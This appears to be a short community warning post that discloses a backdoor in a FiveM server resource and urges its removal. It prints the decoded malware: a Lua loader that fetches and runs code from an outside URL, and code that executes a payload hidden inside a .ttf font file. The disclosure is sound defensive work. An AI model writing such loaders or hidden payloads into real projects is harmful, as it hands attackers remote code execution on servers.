⚠️ WARNING: This resource contains a hidden backdoor
This resource executes remote code and hidden payloads. It is not safe to run on a FiveM server.
Proof
Remote code execution via HTTP
The following Base64 string decodes to:
PerformHttpRequest('https://fivems.lt/bek', function(e, d)
pcall(function()
assert(load(d))()
end)
end)
This downloads Lua code from the internet and executes it on the server without validation.
Hidden payload inside a font file
local data = LoadResourceFile(GetCurrentResourceName(), '/web/fonts/Helvetica.ttf')
data = data.sub(data, 87565)
data = data.gsub(data, '%.%+', '')
data = data.gsub(data, '\\%.', '.')
data = data.gsub(data, '\\', '')
load(data)()
This loads and executes Lua code hidden inside a .ttf file.
This is a classic FiveM backdoor pattern (remote loader + hidden payload).
I strongly recommend removing this resource from any production server.